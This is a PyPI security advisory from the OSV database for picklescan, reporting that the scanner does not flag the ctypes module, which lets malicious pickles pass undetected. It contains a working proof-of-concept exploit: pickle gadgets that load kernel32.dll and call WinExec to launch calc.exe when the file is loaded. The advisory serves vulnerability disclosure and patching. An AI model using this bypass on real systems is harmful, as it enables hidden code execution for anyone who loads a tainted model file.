PYSEC-2026-1782

See a problem?
Import Source
https://github.com/pypa/advisory-database/blob/main/vulns/picklescan/PYSEC-2026-1782.yaml
JSON Data
https://api.osv.dev/v1/vulns/PYSEC-2026-1782
Aliases
Published
2026-07-07T16:03:14.353997Z
Modified
2026-07-07T17:48:01.459459662Z
Severity
  • 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
  • 8.9 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P CVSS Calculator
Summary
Picklescan does not block ctypes
Details

Summary

Picklescan doesnt flag ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to * Load DLLs * Call C functions directly * Manipulate memory raw pointers.

This can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue that ctypes being allowed presents is that it can be used down the line to dismantle interpreter based python sandboxes as ctypes allow direct access to raw memory.

This is a more severe loophole than normal gadget chains and bypasses as raw memory access can be used for a lot of nefarious purposes down the line if left undetected

PoC

import pickle
import ctypes
import operator

class Kernel32Loader:
    def __reduce__(self):
        #we go direct to the kerneeellllllll
        return (ctypes.WinDLL, ("kernel32.dll",))

class WinExecGetter:
    def __reduce__(self):
        return (operator.itemgetter("WinExec"), (Kernel32Loader(),))

class PopCalc:
    def __reduce__(self):
        #methodcaller to invoke "__call__" on the function pointer.
        return (
            operator.methodcaller("__call__", b"calc.exe", 1), 
            (WinExecGetter(),)
        )

try:
    payload = pickle.dumps(PopCalc())

    with open("calc_exploit.pkl", "wb") as f:
        f.write(payload)

    print("Generated 'calc_exploit.pkl'")

except Exception as e:
    print(f"Generation failed: {e}")

This will create a pickle file which is not detected by the latest version of picklescan as malicious

import pickle
print("Loading bypass.pkl...")
pickle.load(open("calc_exploit.pkl", "rb"))

<img width="1333" height="677" alt="image" src="https://github.com/user-attachments/assets/f5b066f3-116a-4377-a538-f293f3a6c176" />

References

Affected packages

PyPI / picklescan

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.0.33

Affected versions

0.*
0.0.1
0.0.2
0.0.3
0.0.4
0.0.5
0.0.6
0.0.7
0.0.8
0.0.9
0.0.10
0.0.11
0.0.12
0.0.13
0.0.14
0.0.15
0.0.16
0.0.17
0.0.18
0.0.19
0.0.20
0.0.21
0.0.22
0.0.23
0.0.24
0.0.25
0.0.26
0.0.27
0.0.28
0.0.29
0.0.30
0.0.31
0.0.32

Database specific

source
"https://github.com/pypa/advisory-database/blob/main/vulns/picklescan/PYSEC-2026-1782.yaml"